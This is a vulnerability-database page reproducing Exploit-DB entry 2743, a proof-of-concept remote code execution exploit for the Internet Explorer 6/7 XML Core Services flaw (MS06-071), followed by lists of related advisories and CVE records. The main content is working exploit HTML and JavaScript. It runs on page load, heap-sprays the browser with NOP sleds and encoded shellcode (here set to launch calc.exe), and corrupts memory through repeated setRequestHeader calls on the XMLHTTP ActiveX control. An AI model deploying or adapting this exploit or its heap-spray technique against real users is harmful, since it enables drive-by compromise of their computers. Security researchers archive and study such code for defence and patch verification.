Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAnonymousEDB-ID:2743
HistoryNov 08, 2006 - 12:00 a.m.

Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (1)

2006-11-0800:00:00
anonymous
www.exploit-db.com
20

AI Score

7.4

Confidence

Low

JSON
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit

Author: n/a

Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239

Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!)

Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called.

/str0ke
-->

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());    

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>

</body></html>

# milw0rm.com [2006-11-08]

Related

checkpoint_advisories 3
canvas 1
nessus 1
exploitdb 3
saint 4
cert 1
securityvulns 1
packetstorm 1
cvelist 30
prion 29
nvd 30
cve 30
debiancve 1
ubuntucve 1
checkpoint_advisories
checkpoint_advisories
Microsoft XMLHTTP Control Open Method Code Execution (MS06-071; CVE-2006-5745)
2006-11-16 00:00:00
Microsoft Internet Explorer XML Core Services Memory Corruption - Ver2 (CVE-2006-5745)
2014-03-03 00:00:00
Preemptive Protection against Microsoft XML Remote Code Execution Vulnerability (MS06-071)
2006-11-14 00:00:00
canvas
canvas
Immunity Canvas: MS06_071
2006-11-06 18:07:00
nessus
nessus
MS06-071: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (928088)
2006-11-14 00:00:00
exploitdb
exploitdb
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)
2006-11-10 00:00:00
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (2)
2006-11-10 00:00:00
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
2010-07-03 00:00:00
saint
saint
Microsoft XMLHTTP ActiveX control setRequestHeader vulnerability
2006-11-17 00:00:00
Microsoft XMLHTTP ActiveX control setRequestHeader vulnerability
2006-11-17 00:00:00
Microsoft XMLHTTP ActiveX control setRequestHeader vulnerability
2006-11-17 00:00:00
cert
cert
Microsoft XML Core Services XMLHTTP ActiveX control vulnerability
2006-11-05 00:00:00
securityvulns
securityvulns
Microsoft Security Bulletin MS06-071 Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution &#40;928088&#41;
2006-11-14 00:00:00
packetstorm
packetstorm
Internet Explorer XML Core Services HTTP Request Handling
2009-11-26 00:00:00
cvelist
cvelist
CVE-2008-5534
2008-12-12 18:13:00
CVE-2006-5745
2006-11-06 18:00:00
CVE-2008-5531
2008-12-12 18:13:00
prion
prion
Design/Logic Flaw
2008-12-12 18:30:00
Design/Logic Flaw
2008-12-12 18:30:00
Design/Logic Flaw
2008-12-12 18:30:00
nvd
nvd
CVE-2006-5745
2006-11-06 18:07:00
CVE-2008-5528
2008-12-12 18:30:02
CVE-2008-5527
2008-12-12 18:30:02
cve
cve
CVE-2008-5538
2008-12-12 18:30:03
CVE-2008-5546
2008-12-12 18:30:03
CVE-2008-5530
2008-12-12 18:30:02
debiancve
debiancve
CVE-2008-5525
2008-12-12 18:30:02
ubuntucve
ubuntucve
CVE-2008-5525
2008-12-12 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:2743
checkpoint_advisories3canvas1nessus1exploitdb3saint4cert1securityvulns1packetstorm1cvelist30prion29nvd30cve30debiancve1ubuntucve1